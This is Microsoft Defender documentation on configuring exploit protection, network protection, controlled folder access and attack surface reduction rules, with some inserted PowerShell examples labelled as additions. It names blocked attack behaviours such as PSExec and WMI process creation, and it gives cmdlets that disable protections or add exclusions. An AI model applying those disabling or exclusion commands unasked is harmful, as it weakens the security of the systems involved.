Mikael configures Data Execution Prevention (DEP) in the System settings section to be Off by default.
Mikael then adds the app test.exe to the Program settings section. In the options for that app, under Data Execution Prevention (DEP), he enables the Override system settings option and sets the switch to On.
There are no other apps listed in the Program settings section.
The result will be that DEP only will be enabled for test.exe. All other apps will not have DEP applied.
Example 2
Josie configures Data Execution Prevention (DEP) in the System settings section to be Off by default.
Josie then adds the app test.exe to the Program settings section. In the options for that app, under Data Execution Prevention (DEP), she enables the Override system settings option and sets the switch to On.
Josie also adds the app miles.exe to the Program settings section and configures Control flow guard (CFG) to
On. She doesn't enable the Override system settings option for DEP or any other mitigations for that app.
The result will be that DEP will be enabled for test.exe. DEP will not be enabled for any other app, including
miles.exe. CFG will be enabled for miles.exe.

Intune
1. Sign in to the Azure portal and open Intune.
2. Click Device configuration > Profiles > Create profile.
3. Name the profile, choose Windows 10 and later and Endpoint protection.

4. Click Configure > Windows Defender Exploit Guard > Exploit protection.
5. Upload an XML file with the exploit protection settings.
6. Click OK to save each open blade and click Create.
7. Click the profile Assignments, assign to All Users & All Devices, and click Save.

MDM
Use the ./Vendor/MSFT/Policy/Config/ExploitGuard/ExploitProtectionSettings configuration service provider (CSP) to enable or disable exploit protection mitigations or to use audit mode.

SCCM
1. In System Center Configuration Manager, click Assets and Compliance > Endpoint Protection >
Windows Defender Exploit Guard.
2. Click Home > Create Exploit Guard Policy.
3. Enter a name and a description, click Exploit protection, and click Next.
4. Browse to the location of the exploit protection XML file and click Next.
5. Review the settings and click Next to create the policy.
6. After the policy is created, click Close.

Group Policy
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Exploit Guard > Exploit Protection
> Use a common set of exploit protection settings.
4. Click Enabled and type the location of the XML file and click OK.
PowerShell
You can use the PowerShell verb Get or Set with the cmdlet ProcessMitigation. Using Get will list the current configuration status of any mitigations that have been enabled on the device; add the -Name parameter and the app's executable name to see mitigations for just that app:

Get-ProcessMitigation -Name processName.exe

IMPORTANT
System-level mitigations that have not been configured will show a status of NOTSET .
For system-level settings, NOTSET indicates the default setting for that mitigation has been applied.
For app-level settings, NOTSET indicates the system-level setting for the mitigation will be applied.
The default setting for each system-level mitigation can be seen in the Windows Security.

Use Set to configure each mitigation in the following format:

Set-ProcessMitigation -<scope> <app executable> -<action> <mitigation or options>,<mitigation or options>,<mitigation or options>

Where:
<Scope>:
-Name to indicate the mitigations should be applied to a specific app. Specify the app's executable after
this flag.
-System to indicate the mitigation should be applied at the system level
<Action>:
-Enable to enable the mitigation
-Disable to disable the mitigation
<Mitigation>:
The mitigation's cmdlet along with any suboptions (surrounded with spaces). Each mitigation is
separated with a comma.
For example, to enable the Data Execution Prevention (DEP) mitigation with ATL thunk emulation for an executable called testing.exe in the folder C:\Apps\LOB\tests, and to prevent that executable from creating child processes, you'd use the following command:

Set-ProcessMitigation -Name c:\apps\lob\tests\testing.exe -Enable DEP, EmulateAtlThunks, DisallowChildProcessCreation

IMPORTANT
Separate each mitigation option with commas.

If you wanted to apply DEP at the system level, you'd use the following command:

Set-ProcessMitigation -System -Enable DEP

To disable mitigations, you can replace -Enable with -Disable. However, for app-level mitigations, this will force the mitigation to be disabled only for that app.
If you need to restore the mitigation back to the system default, you need to include the -Remove parameter as well, as in the following example:

Set-ProcessMitigation -Name test.exe -Remove -Disable DEP
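The audit-then-enforce workflow described above for a single app, as an added PowerShell example that is not part of the original page: it uses the page's own testing.exe path and the cmdlet values from the mitigation table, and exports the XML that the Intune, SCCM and Group Policy procedures above consume. The function names, the -RegistryConfigFilePath export and the event log channel names are assumptions of this example, not statements from the page.

```powershell
# Added example (not from the Microsoft docs page): roll out exploit protection
# for one line-of-business executable in three phases: audit, enforce, export.
# C:\Apps\LOB\tests\testing.exe is the path used in the page's own example.

$App = 'C:\Apps\LOB\tests\testing.exe'

function Enable-AuditMitigations {
    param([string]$Executable)
    # Audit-mode values from the mitigation table: events are logged but nothing
    # is blocked, so the app keeps working while you learn what enforcement would break.
    Set-ProcessMitigation -Name $Executable -Enable AuditDynamicCode, AuditChildProcess
}

function Get-MitigationAuditEvents {
    param([string]$Executable, [int]$Hours = 24)
    # Assumption: exploit protection logs to these two channels (not named on this page).
    $logs = 'Microsoft-Windows-Security-Mitigations/UserMode',
            'Microsoft-Windows-Security-Mitigations/KernelMode'
    $since = (Get-Date).AddHours(-$Hours)
    $leaf = Split-Path -Path $Executable -Leaf
    foreach ($log in $logs) {
        Get-WinEvent -FilterHashtable @{ LogName = $log; StartTime = $since } -ErrorAction SilentlyContinue |
            Where-Object { $_.Message -like "*$leaf*" } |
            Select-Object TimeCreated, Id, LogName, Message
    }
}

function Enable-EnforcedMitigations {
    param([string]$Executable)
    # The page's own example: DEP with ATL thunk emulation, plus no child processes.
    Set-ProcessMitigation -Name $Executable -Enable DEP, EmulateAtlThunks, DisallowChildProcessCreation
    # Promote Arbitrary Code Guard from audit to enforce once the audit log is clean.
    Set-ProcessMitigation -Name $Executable -Enable DynamicCode
    Set-ProcessMitigation -Name $Executable -Disable AuditDynamicCode, AuditChildProcess
}

function Export-MitigationConfig {
    param([string]$Path)
    # Assumption: -RegistryConfigFilePath writes the device's current configuration
    # to an XML file, which is the artifact the Intune, SCCM and GPO steps above take.
    Get-ProcessMitigation -RegistryConfigFilePath $Path
}

function Remove-AppMitigations {
    param([string]$Executable)
    # -Remove together with -Disable restores the system default for the app instead
    # of pinning each mitigation to Off (see the page's test.exe example above).
    Set-ProcessMitigation -Name $Executable -Remove -Disable DEP, EmulateAtlThunks, `
        DisallowChildProcessCreation, DynamicCode, AuditDynamicCode, AuditChildProcess
}

# Phase 1: audit only, then look at what the app is reported doing.
Enable-AuditMitigations -Executable $App
Get-ProcessMitigation -Name $App   # app-level values read ON/OFF; NOTSET means the system-level setting applies
$events = Get-MitigationAuditEvents -Executable $App -Hours 24

# Phase 2: enforce only when the audit window produced no hits for this app.
if (-not $events) {
    Enable-EnforcedMitigations -Executable $App
} else {
    Write-Warning "Audit events found for $App; review them before enforcing:"
    $events | Format-Table -AutoSize
}

# Phase 3: capture the resulting configuration for deployment to other machines.
Export-MitigationConfig -Path "$env:TEMP\ExploitProtection.xml"
```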

This table lists the PowerShell cmdlets (and associated audit mode cmdlet) that can be used to configure each
mitigation.

MITIGATION | APPLIES TO | POWERSHELL CMDLETS | AUDIT MODE CMDLET
Control flow guard (CFG) | System and app-level | CFG, StrictCFG, SuppressExports | Audit not available
Data Execution Prevention (DEP) | System and app-level | DEP, EmulateAtlThunks | Audit not available
Force randomization for images (Mandatory ASLR) | System and app-level | ForceRelocateImages | Audit not available
Randomize memory allocations (Bottom-Up ASLR) | System and app-level | BottomUp, HighEntropy | Audit not available
Validate exception chains (SEHOP) | System and app-level | SEHOP, SEHOPTelemetry | Audit not available
Validate heap integrity | System and app-level | TerminateOnHeapError | Audit not available
Arbitrary code guard (ACG) | App-level only | DynamicCode | AuditDynamicCode
Block low integrity images | App-level only | BlockLowLabel | AuditImageLoad
Block remote images | App-level only | BlockRemoteImages | Audit not available
Block untrusted fonts | App-level only | DisableNonSystemFonts | AuditFont, FontAuditOnly
Code integrity guard | App-level only | BlockNonMicrosoftSigned, AllowStoreSigned | AuditMicrosoftSigned, AuditStoreSigned
Disable extension points | App-level only | ExtensionPoint | Audit not available
Disable Win32k system calls | App-level only | DisableWin32kSystemCalls | AuditSystemCall
Do not allow child processes | App-level only | DisallowChildProcessCreation | AuditChildProcess
Export address filtering (EAF) | App-level only | EnableExportAddressFilterPlus, EnableExportAddressFilter [1] | Audit not available
Import address filtering (IAF) | App-level only | EnableImportAddressFilter | Audit not available
Simulate execution (SimExec) | App-level only | EnableRopSimExec | Audit not available
Validate API invocation (CallerCheck) | App-level only | EnableRopCallerCheck | Audit not available
Validate handle usage | App-level only | StrictHandle | Audit not available
Validate image dependency integrity | App-level only | EnforceModuleDependencySigning | Audit not available
Validate stack integrity (StackPivot) | App-level only | EnableRopStackPivot | Audit not available

[1]: Use the following format to enable EAF modules for DLLs for a process:

Set-ProcessMitigation -Name processName.exe -Enable EnableExportAddressFilterPlus -EAFModules dllName1.dll,dllName2.dll
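The following script is an added example, not code from the original documentation: it applies the app-level mitigations described above to the page's sample executable, reads the effective state back, and restores the system defaults. The path C:\Apps\LOB\tests\testing.exe follows the page's example; the EAF module names (kernel32.dll, ntdll.dll) and the way Get-ConfiguredMitigations walks the object returned by Get-ProcessMitigation (nested mitigation groups whose leaf values read ON, OFF or NOTSET) are assumptions.

```powershell
# Added example (not from the original documentation). The executable path follows the
# page; the DLL names and the object walk in Get-ConfiguredMitigations are assumptions
# and may need adjusting for the Windows build in use.
$LobExe = 'C:\Apps\LOB\tests\testing.exe'

function Enable-LobMitigations {
    param([string]$Path = $LobExe)
    # App-level: enforce DEP (with ATL thunk emulation for older COM components) and
    # block child process creation. Anything not named here stays NOTSET for the app,
    # so the system-level setting continues to apply.
    Set-ProcessMitigation -Name $Path -Enable DEP, EmulateAtlThunks, DisallowChildProcessCreation
    # Arbitrary code guard in audit mode only: JIT or plugin breakage is written to the
    # event log without being enforced, so it can be reviewed before DynamicCode is enabled.
    Set-ProcessMitigation -Name $Path -Enable AuditDynamicCode
    # Export address filtering, using the footnote's -EAFModules format (module list assumed).
    Set-ProcessMitigation -Name $Path -Enable EnableExportAddressFilterPlus -EAFModules kernel32.dll, ntdll.dll
}

function Get-ConfiguredMitigations {
    param([string]$Path = $LobExe)
    # Query by executable name, as the page does, and list only the settings that are
    # explicitly ON or OFF; NOTSET means the system-level setting applies to this app.
    $mitigations = Get-ProcessMitigation -Name (Split-Path -Leaf $Path)
    foreach ($group in $mitigations.PSObject.Properties) {
        if ($null -eq $group.Value -or $group.Value -is [string]) { continue }
        foreach ($setting in $group.Value.PSObject.Properties) {
            $state = "$($setting.Value)".ToUpperInvariant()
            if ($state -in @('ON', 'OFF')) {
                [pscustomobject]@{ Group = $group.Name; Setting = $setting.Name; State = $state }
            }
        }
    }
}

function Restore-LobMitigationDefaults {
    param([string]$Path = $LobExe)
    # -Remove together with -Disable returns the app to the system default instead of
    # pinning each mitigation OFF for that app.
    Set-ProcessMitigation -Name $Path -Remove -Disable DEP, EmulateAtlThunks, DisallowChildProcessCreation, AuditDynamicCode, EnableExportAddressFilterPlus
}

# Typical flow from an elevated PowerShell session:
Enable-LobMitigations
Get-ConfiguredMitigations | Format-Table -AutoSize
# Restore-LobMitigationDefaults   # when the app is retired or its settings move to an XML policy
```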

Customize the notification


See the Windows Security topic for more information about customizing the notification when a rule is triggered
and blocks an app or file.

Related topics
Comparison with Enhanced Mitigation Experience Toolkit
Evaluate exploit protection
Configure and audit exploit protection mitigations
Import, export, and deploy exploit protection configurations
Import, export, and deploy exploit protection configurations
4/5/2019 • 5 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Exploit protection helps protect devices from malware that uses exploits to spread and infect. It consists of
a number of mitigations that can be applied at either the operating system level, or at the individual app level.
It is part of Windows Defender Exploit Guard.
Many of the features that are part of the Enhanced Mitigation Experience Toolkit (EMET) are now included in
exploit protection.
You use the Windows Security app or PowerShell to create a set of mitigations (known as a configuration). You
can then export this configuration as an XML file and share it with multiple machines on your network so they all
have the same set of mitigation settings.
You can also convert and import an existing EMET configuration XML file into an exploit protection configuration
XML.
This topic describes how to create a configuration file and deploy it across your network, and how to convert an
EMET configuration.
The Exploit Guard Evaluation Package contains a sample configuration file (named ProcessMitigation-Selfhost-v4.xml)
that you can use to see how the XML structure looks. The sample file also contains settings that have been
converted from an EMET configuration. You can open the file in a text editor (such as Notepad) or import it
directly into exploit protection and then review the settings in the Windows Security app, as described further in
this topic.

Create and export a configuration file


Before you export a configuration file, you need to ensure you have the correct settings.
You should first configure exploit protection on a single, dedicated machine. See Customize exploit protection for
descriptions about and instructions for configuring mitigations.
When you have configured exploit protection to your desired state (including both system-level and app-level
mitigations), you can export the file using either the Windows Security app or PowerShell.
Use the Windows Security app to export a configuration file
1. Open the Windows Security app by clicking the shield icon in the task bar or searching the start menu for
Defender.
2. Click the App & browser control tile (or the app icon on the left menu bar) and then click Exploit
protection settings:
3. At the bottom of the Exploit protection section, click Export settings and then choose the location and
name of the XML file where you want the configuration to be saved.

NOTE
When you export the settings, all settings for both app-level and system-level mitigations are saved. This means you don't
need to export a file from both the System settings and Program settings sections - either section will export all settings.

Use PowerShell to export a configuration file


1. Type powershell in the Start menu, right-click Windows PowerShell and click Run as administrator
2. Enter the following cmdlet:

Get-ProcessMitigation -RegistryConfigFilePath filename.xml

Change filename to any name or location of your choosing.


IMPORTANT
When you deploy the configuration using Group Policy, all machines that will use the configuration must be able to access
the configuration file. Ensure you place the file in a shared location.

Import a configuration file


You can import an exploit protection configuration file that you've previously created. You can only use
PowerShell to import the configuration file.
After importing, the settings will be instantly applied and can be reviewed in the Windows Security app.
Use PowerShell to import a configuration file
1. Type powershell in the Start menu, right-click Windows PowerShell and click Run as administrator
2. Enter the following cmdlet:

Set-ProcessMitigation -PolicyFilePath filename.xml

Change filename to the location and name of the exploit protection XML file.

IMPORTANT
Ensure you import a configuration file that is created specifically for exploit protection. You cannot directly import an EMET
configuration file, you must convert it first.

Convert an EMET configuration file to an exploit protection configuration file

You can convert an existing EMET configuration file to the new format used by exploit protection. You must do
this if you want to import an EMET configuration into exploit protection in Windows 10.
You can only do this conversion in PowerShell.

WARNING
You cannot directly convert the default EMET configuration files that are distributed with EMET. These files are intended to
help set up EMET for a first-time user. Attempting to directly convert these files into an Exploit protection configuration file
will not work.
However, if you want to apply the same settings as in the default EMET configuration files, you must first import the default
configuration file into EMET, then export the settings to a new file.
You can then convert that file using the PowerShell cmdlet described here before importing the settings into Exploit
protection.

1. Type powershell in the Start menu, right-click Windows PowerShell and click Run as administrator
2. Enter the following cmdlet:

ConvertTo-ProcessMitigationPolicy -EMETFilePath emetFile.xml -OutputFilePath filename.xml

Change emetFile to the name and location of the EMET configuration file, and change filename to whichever
location and file name you want to use.

IMPORTANT
If you have enabled Mandatory ASLR for any apps in EMET, export the EMET settings to an XML file, and then convert the
XML file into an Exploit protection configuration file, you will need to manually edit the converted XML file to ensure the
Mandatory ASLR mitigation setting is correctly configured:
1. Open the PowerShell-converted XML file in a text editor.
2. Search for ASLR ForceRelocateImages="false" and change it to ASLR ForceRelocateImages="true" for each app
for which you want Mandatory ASLR enabled.
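The script below is an added example, not code from the original documentation: it runs the three steps of this procedure (convert the exported EMET file, fix the Mandatory ASLR setting for the listed apps, import the result) in one function. It assumes the converted XML holds each app's settings in an AppConfig element with an Executable attribute that contains the ASLR element the page tells you to search for; the file names and app list in the call at the end are placeholders.

```powershell
# Added example (not from the original documentation). The element layout assumed below
# (AppConfig with an Executable attribute containing an ASLR element) should be verified
# against your own converted file.
function Convert-EmetToExploitProtection {
    param(
        [Parameter(Mandatory)] [string]$EmetFilePath,
        [Parameter(Mandatory)] [string]$OutputFilePath,
        # Executables that had Mandatory ASLR enabled in EMET (file names as EMET lists them).
        [string[]]$MandatoryAslrApps = @()
    )
    # Step 1: convert the settings exported from EMET (not the stock EMET default files,
    # which the page says cannot be converted directly).
    ConvertTo-ProcessMitigationPolicy -EMETFilePath $EmetFilePath -OutputFilePath $OutputFilePath

    # Step 2: the conversion leaves ForceRelocateImages="false"; flip it for the listed apps.
    $fullPath = (Resolve-Path -LiteralPath $OutputFilePath).Path
    [xml]$policy = Get-Content -LiteralPath $fullPath -Raw
    $seen    = New-Object System.Collections.Generic.List[string]
    $patched = New-Object System.Collections.Generic.List[string]
    foreach ($aslr in $policy.SelectNodes('//ASLR')) {
        $exe = $aslr.ParentNode.GetAttribute('Executable')   # assumed attribute name
        if ([string]::IsNullOrEmpty($exe)) { continue }      # system-level ASLR element
        $seen.Add($exe)
        if ($MandatoryAslrApps -contains $exe -and $aslr.GetAttribute('ForceRelocateImages') -eq 'false') {
            $aslr.SetAttribute('ForceRelocateImages', 'true')
            $patched.Add($exe)
        }
    }
    $policy.Save($fullPath)

    # Flag requested apps that have no entry at all, so a misspelled name is caught before
    # the policy is imported rather than discovered later on a protected machine.
    $missing = $MandatoryAslrApps | Where-Object { $seen -notcontains $_ }
    if ($missing) { Write-Warning "No ASLR entry found for: $($missing -join ', ')" }

    # Step 3: import the converted and patched policy; the settings apply immediately.
    Set-ProcessMitigation -PolicyFilePath $fullPath
    $patched
}

# Placeholder file names and app list; replace with your EMET export and destination.
Convert-EmetToExploitProtection -EmetFilePath 'C:\EMET\exported-settings.xml' `
    -OutputFilePath 'C:\MitigationSettings\Config.xml' -MandatoryAslrApps 'testing.exe', 'legacyapp.exe'
```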

Manage or deploy a configuration


You can use Group Policy to deploy the configuration you've created to multiple machines in your network.

IMPORTANT
When you deploy the configuration using Group Policy, all machines that will use the configuration must be able to access
the configuration XML file. Ensure you place the file in a shared location.

Use Group Policy to distribute the configuration


1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Exploit Guard > Exploit protection.

4. Double-click the Use a common set of Exploit protection settings setting and set the option to
Enabled.
5. In the Options: section, enter the location and filename of the Exploit protection configuration file that
you want to use, such as in the following examples:
C:\MitigationSettings\Config.XML
\\Server\Share\Config.xml
https://localhost:8080/Config.xml
6. Click OK and Deploy the updated GPO as you normally do.

Related topics
Protect devices from exploits
Comparison with Enhanced Mitigation Experience Toolkit
Evaluate exploit protection
Enable exploit protection
Configure and audit exploit protection mitigations
Enable network protection
4/24/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Network protection helps to prevent employees from using any application to access dangerous domains that
may host phishing scams, exploits, and other malicious content on the Internet. You can audit network protection
in a test environment to see which apps would be blocked before you enable it.
You can enable network protection by using any of these methods:
Microsoft Intune
Mobile Device Management (MDM)
System Center Configuration Manager (SCCM)
Group Policy
PowerShell

Intune
1. Sign in to the Azure portal and open Intune.
2. Click Device configuration > Profiles > Create profile.
3. Name the profile, choose Windows 10 and later and Endpoint protection.

4. Click Configure > Windows Defender Exploit Guard > Network filtering > Enable.

5. Click OK to save each open blade and click Create.


6. Click the profile Assignments, assign to All Users & All Devices, and click Save.
MDM
Use the ./Vendor/MSFT/Policy/Config/Defender/EnableNetworkProtection configuration service provider (CSP)
to enable or disable network protection or enable audit mode.

SCCM
1. In System Center Configuration Manager, click Assets and Compliance > Endpoint Protection >
Windows Defender Exploit Guard.
2. Click Home > Create Exploit Guard Policy.
3. Enter a name and a description, click Network protection, and click Next.
4. Choose whether to block or audit access to suspicious domains and click Next.
5. Review the settings and click Next to create the policy.
6. After the policy is created, click Close.

Group Policy
You can use the following procedure to enable network protection on domain-joined computers or on a
standalone computer.
1. On a standalone computer, click Start, type and then click Edit group policy.
-Or-
On a domain-joined Group Policy management computer, open the Group Policy Management Console,
right-click the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Windows Defender
Exploit Guard > Network protection.
4. Double-click the Prevent users and apps from accessing dangerous websites setting and set the
option to Enabled. In the options section, you must specify one of the following:
Block - Users will not be able to access malicious IP addresses and domains
Disable (Default) - The Network protection feature will not work. Users will not be blocked from
accessing malicious domains
Audit Mode - If a user visits a malicious IP address or domain, an event will be recorded in the
Windows event log but the user will not be blocked from visiting the address.

IMPORTANT
To fully enable network protection, you must set the Group Policy option to Enabled and also select Block in the options
drop-down menu.

You can confirm network protection is enabled on a local computer by using Registry editor:
1. Click Start and type regedit to open Registry Editor.
2. Navigate to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Network Protection
3. Click EnableNetworkProtection and confirm the value:
0=Off
1=On
2=Audit

PowerShell
1. Type powershell in the Start menu, right-click Windows PowerShell and click Run as administrator
2. Enter the following cmdlet:

Set-MpPreference -EnableNetworkProtection Enabled

You can enable the feature in audit mode using the following cmdlet:

Set-MpPreference -EnableNetworkProtection AuditMode

Use Disabled instead of AuditMode or Enabled to turn the feature off.

Related topics
Windows Defender Exploit Guard
Network protection
Evaluate network protection
Troubleshoot network protection
Enable controlled folder access
4/29/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Controlled folder access helps you protect valuable data from malicious apps and threats, such as ransomware. It
is part of Windows Defender Exploit Guard. Controlled folder access is included with Windows 10 and Windows
Server 2019.
You can enable controlled folder access by using any of these methods:
Windows Security app
Microsoft Intune
Mobile Device Management (MDM)
System Center Configuration Manager (SCCM)
Group Policy
PowerShell
Audit mode allows you to test how the feature would work (and review events) without impacting the normal use
of the machine.
Group Policy settings that disable local administrator list merging will override controlled folder access settings.
They also override protected folders and allowed apps set by the local administrator through controlled folder
access. These policies include:
Windows Defender Antivirus Configure local administrator merge behavior for lists
System Center Endpoint Protection Allow users to add exclusions and overrides
For more information about disabling local list merging, see Prevent or allow users to locally modify Windows
Defender AV policy settings.

Windows Security app


1. Open the Windows Security app by clicking the shield icon in the task bar or searching the start menu for
Defender.
2. Click the Virus & threat protection tile (or the shield icon on the left menu bar) and then click
Ransomware protection.
3. Set the switch for Controlled folder access to On.

NOTE
If controlled folder access is configured with Group Policy, PowerShell, or MDM CSPs, the state will change in the Windows
Security app after a restart of the device. If the feature is set to Audit mode with any of those tools, the Windows Security
app will show the state as Off.

Intune
1. Sign in to the Azure portal and open Intune.
2. Click Device configuration > Profiles > Create profile.
3. Name the profile, choose Windows 10 and later and Endpoint protection.

4. Click Configure > Windows Defender Exploit Guard > Network filtering > Enable.
5. Type the path to each application that has access to protected folders and the path to any additional folder that
needs protection and click Add.

NOTE
Wildcard is supported for applications, but not for folders. Subfolders are not protected.

6. Click OK to save each open blade and click Create.
7. Click the profile Assignments, assign to All Users & All Devices, and click Save.

MDM
Use the ./Vendor/MSFT/Policy/Config/ControlledFolderAccessProtectedFolders configuration service provider
(CSP) to allow apps to make changes to protected folders.

SCCM
1. In System Center Configuration Manager, click Assets and Compliance > Endpoint Protection >
Windows Defender Exploit Guard.
2. Click Home > Create Exploit Guard Policy.
3. Enter a name and a description, click Controlled folder access, and click Next.
4. Choose whether to block or audit changes, allow other apps, or add other folders, and click Next.

NOTE
Wildcard is supported for applications, but not for folders. Subfolders are not protected.

5. Review the settings and click Next to create the policy.
6. After the policy is created, click Close.

Group Policy
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Windows Defender
Exploit Guard > Controlled folder access.
4. Double-click the Configure Controlled folder access setting and set the option to Enabled. In the
options section you must specify one of the following:
Enable - Malicious and suspicious apps will not be allowed to make changes to files in protected
folders. A notification will be provided in the Windows event log
Disable (Default) - The Controlled folder access feature will not work. All apps can make changes to
files in protected folders.
Audit Mode - If a malicious or suspicious app attempts to make a change to a file in a protected
folder, the change will be allowed but will be recorded in the Windows event log. This allows you to
assess the impact of this feature on your organization.

IMPORTANT
To fully enable controlled folder access, you must set the Group Policy option to Enabled and also select Enable in the
options drop-down menu.

PowerShell
1. Type powershell in the Start menu, right-click Windows PowerShell and click Run as administrator.
2. Enter the following cmdlet:
Set-MpPreference -EnableControlledFolderAccess Enabled

You can enable the feature in audit mode by specifying AuditMode instead of Enabled.
Use Disabled to turn the feature off.

Related topics
Protect important folders with controlled folder access
Customize controlled folder access
Evaluate Windows Defender ATP
Enable attack surface reduction rules
4/29/2019 • 5 minutes to read

Attack surface reduction rules help prevent actions and apps that malware often uses to infect computers. You
can set attack surface reduction rules for computers running Windows 10 or Windows Server 2019.
Each ASR rule contains three settings:
Not configured: Disable the ASR rule
Block: Enable the ASR rule
Audit: Evaluate how the ASR rule would impact your organization if enabled
To use ASR rules, you need either a Windows 10 Enterprise E3 or E5 license. We recommend an E5 license so
you can take advantage of the advanced monitoring and reporting capabilities available in Windows Defender
Advanced Threat Protection (Windows Defender ATP). These advanced capabilities aren't available with an E3
license, but you can develop your own monitoring and reporting tools to use in conjunction with ASR rules.
You can enable attack surface reduction rules by using any of these methods:
Microsoft Intune
Mobile Device Management (MDM)
System Center Configuration Manager (SCCM)
Group Policy
PowerShell
Enterprise-level management such as Intune or SCCM is recommended. Enterprise-level management will
overwrite any conflicting Group Policy or PowerShell settings on startup.

Exclude files and folders from ASR rules


You can exclude files and folders from being evaluated by most attack surface reduction rules. This means that
even if an ASR rule determines the file or folder contains malicious behavior, it will not block the file from
running. This could potentially allow unsafe files to run and infect your devices.

WARNING
Excluding files or folders can severely reduce the protection provided by ASR rules. Excluded files will be allowed to run, and
no report or event will be recorded.
If ASR rules are detecting files that you believe shouldn't be detected, you should use audit mode first to test the rule.

IMPORTANT
File and folder exclusions do not apply to the following ASR rules:
Block process creations originating from PSExec and WMI commands
Block JavaScript or VBScript from launching downloaded executable content

You can specify individual files or folders (using folder paths or fully qualified resource names) but you can't
specify which rules the exclusions apply to.
ASR rules support environment variables and wildcards. For information about using wildcards, see Use
wildcards in the file name and folder path or extension exclusion lists.
The following procedures for enabling ASR rules include instructions for how to exclude files and folders.

Intune
1. In Intune, select Device configuration > Profiles. Choose an existing endpoint protection profile or
create a new one. To create a new one, select Create profile and enter information for this profile. For
Profile type, select Endpoint protection. If you've chosen an existing profile, select Properties and then
select Settings.
2. In the Endpoint protection pane, select Windows Defender Exploit Guard, then select Attack
Surface Reduction. Select the desired setting for each ASR rule.
3. Under Attack Surface Reduction exceptions, you can enter individual files and folders, or you can
select Import to import a CSV file that contains files and folders to exclude from ASR rules. Each line in
the CSV file should be in the following format:
C:\folder, %ProgramFiles%\folder\file, C:\path
4. Select OK on the three configuration panes and then select Create if you're creating a new endpoint
protection file or Save if you're editing an existing one.

MDM
Use the ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules configuration service provider
(CSP) to individually enable and set the mode for each rule.
The following is a sample for reference, using GUID values for ASR rules.
OMA-URI path: ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules
Value: {75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84}=2|{3B576869-A4EC-4529-8536-B80A7769E899}=1|{D4F940AB-401B-4EFC-AADC-AD5F3C50688A}=2|{D3E037E1-3EB8-44C8-A917-57927947596D}=1|{5BEB7EFE-FD9A-4556-801D-275E5FFC04CC}=0|{BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550}=1
The values to enable, disable, or enable in audit mode are:
Disable = 0
Block (enable ASR rule) = 1
Audit = 2
Use the ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions configuration service
provider (CSP) to add exclusions.
Example:
OMA-URI path: ./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionOnlyExclusions
Value: c:\path|e:\path|c:\Whitelisted.exe

NOTE
Be sure to enter OMA-URI values without spaces.

SCCM
1. In System Center Configuration Manager, click Assets and Compliance > Endpoint Protection >
Windows Defender Exploit Guard.
2. Click Home > Create Exploit Guard Policy.
3. Enter a name and a description, click Attack Surface Reduction, and click Next.
4. Choose which rules will block or audit actions and click Next.
5. Review the settings and click Next to create the policy.
6. After the policy is created, click Close.

Group Policy
WARNING
If you manage your computers and devices with Intune, SCCM, or another enterprise-level management platform, the
management software will overwrite any conflicting Group Policy settings on startup.

1. On your Group Policy management computer, open the Group Policy Management Console, right-click
the Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative
templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Windows Defender
Exploit Guard > Attack surface reduction.
4. Select Configure Attack surface reduction rules and select Enabled. You can then set the individual
state for each rule in the options section:
Click Show... and enter the rule ID in the Value name column and your desired state in the Value
column as follows:
Disable = 0
Block (enable ASR rule) = 1
Audit = 2
5. To exclude files and folders from ASR rules, select the Exclude files and paths from Attack surface
reduction rules setting and set the option to Enabled. Click Show and enter each file or folder in the
Value name column. Enter 0 in the Value column for each item.

PowerShell
WARNING
If you manage your computers and devices with Intune, SCCM, or another enterprise-level management platform, the
management software will overwrite any conflicting PowerShell settings on startup.

1. Type powershell in the Start menu, right-click Windows PowerShell and click Run as administrator.
2. Enter the following cmdlet:

Set-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions Enabled

To enable ASR rules in audit mode, use the following cmdlet:

Add-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions AuditMode

To turn off ASR rules, use the following cmdlet:

Add-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions Disabled

IMPORTANT
You must specify the state individually for each rule, but you can combine rules and states in a comma-separated
list.
In the following example, the first two rules will be enabled, the third rule will be disabled, and the fourth rule will be
enabled in audit mode:

Set-MpPreference -AttackSurfaceReductionRules_Ids <rule ID 1>,<rule ID 2>,<rule ID 3>,<rule ID 4> -AttackSurfaceReductionRules_Actions Enabled, Enabled, Disabled, AuditMode

You can also use the Add-MpPreference cmdlet to add new rules to the existing list.

WARNING
Set-MpPreference will always overwrite the existing set of rules. If you want to add to the existing set, you should
use Add-MpPreference instead. You can obtain a list of rules and their current state by using Get-MpPreference.

3. To exclude files and folders from ASR rules, use the following cmdlet:

Add-MpPreference -AttackSurfaceReductionOnlyExclusions "<fully qualified path or resource>"

Continue to use Add-MpPreference -AttackSurfaceReductionOnlyExclusions to add more files and folders to
the list.

IMPORTANT
Use Add-MpPreference to append or add apps to the list. Using the Set-MpPreference cmdlet will overwrite the
existing list.
